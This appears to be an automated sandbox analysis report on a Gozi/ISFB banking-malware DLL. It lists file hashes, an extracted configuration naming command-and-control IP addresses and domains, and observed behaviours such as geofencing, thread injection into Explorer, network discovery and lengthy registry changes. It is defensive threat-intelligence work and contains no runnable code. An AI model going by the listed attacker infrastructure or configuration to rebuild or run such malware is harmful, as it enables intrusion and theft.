Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 10:56
Static task
static1
Behavioral task
behavioral1
Sample
8fcfb8f38d8607c57f08f9b39139065f.dll
Resource
win7-20220715-en
General
-
Target
8fcfb8f38d8607c57f08f9b39139065f.dll
-
Size
300KB
-
MD5
8fcfb8f38d8607c57f08f9b39139065f
-
SHA1
805bb719009145dcc32b5361abf5bb4d91015dbb
-
SHA256
ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
-
SHA512
6d02b5338e387185520c45a45434bf5e949fdfd66d484459c3e817b76fbfc50621d0fbd5e4e5f3618f02ea257b8d73a53637b7bc791cc40300e837e2de72007f
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 1728 set thread context of 2588 1728 powershell.exe Explorer.EXE PID 2588 set thread context of 3396 2588 Explorer.EXE RuntimeBroker.exe PID 2588 set thread context of 3664 2588 Explorer.EXE RuntimeBroker.exe PID 2588 set thread context of 3520 2588 Explorer.EXE RuntimeBroker.exe PID 2588 set thread context of 4752 2588 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 676 net.exe 856 net.exe 3360 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 56 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d898b3f779591c13da1f2b28ce32141fe3eb569a7d6f4a1152ba756aad77d00" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a94ab9e0a277a1865d03111cc1a70ac901b509c24bef77035af18ae5203b6e37" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4a7ec7f38a7d8018c66ae9238a7d8018c66ae9238a7d801a67d08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000316337343330316536313435343930633637333336316134356530633030393230643635323638333034323838616237653265306230666636373134613537620000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000b44ad300310063003700340033003000310065003600310034003500340039003000630036003700330033003600310061003400350065003000630030003000390032003000640036003500320036003800330030003400320038003800610062003700650032006500300062003000660066003600370031003400610035003700620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31633734333031653631343534393063363733333631613435653063303039323064363532363833303432383861623765326530623066663637313461353762000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b987cab8-05db-4909- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\071ae30bc7365699d044a75ba8191e4d9c39200fc27b8565d88dae1ec87013d4" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000761de37f38a7d801bde8289238a7d801bde8289238a7d801fa580d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000626639623338316330663664366336383433633665373562313431623239303232633939653565616639626137626434623131623539393833626563323664360000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00620066003900620033003800310063003000660036006400360063003600380034003300630036006500370035006200310034003100620032003900300032003200630039003900650035006500610066003900620061003700620064003400620031003100620035003900390038003300620065006300320036006400360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62663962333831633066366436633638343363366537356231343162323930323263393965356561663962613762643462313162353939383362656332366436000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = e80b8e9238a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\80ce800c-4267-4baa- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002849ac7f38a7d801e36b329238a7d801e36b329238a7d8019f5112000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000366438393862336637373935393163313364613166326232386365333231343166653365623536396137643666346131313532626137353661616437376430300000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003274da00360064003800390038006200330066003700370039003500390031006300310033006400610031006600320062003200380063006500330032003100340031006600650033006500620035003600390061003700640036006600340061003100310035003200620061003700350036006100610064003700370064003000300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643839386233663737393539316331336461316632623238636533323134316665336562353639613764366634613131353262613735366161643737643030000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1c74301e6145490c673361a45e0c00920d65268304288ab7e2e0b0ff6714a57b" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67746a65-1fa0-4632- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 9c256d9238a7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008f7fe57f38a7d8018f66709238a7d8018f66709238a7d80114a80c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000613934616239653061323737613138363564303331313163633161373061633930316235303963323462656637373033356166313861653532303362366533370000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003c95e100610039003400610062003900650030006100320037003700610031003800360035006400300033003100310031006300630031006100370030006100630039003000310062003500300039006300320034006200650066003700370030003300350061006600310038006100650035003200300033006200360065003300370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61393461623965306132373761313836356430333131316363316137306163393031623530396332346265663737303335616631386165353230336236653337000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = ffa4c19238a7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 449ce29238a7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "0" RuntimeBroker.exe Set value (data) 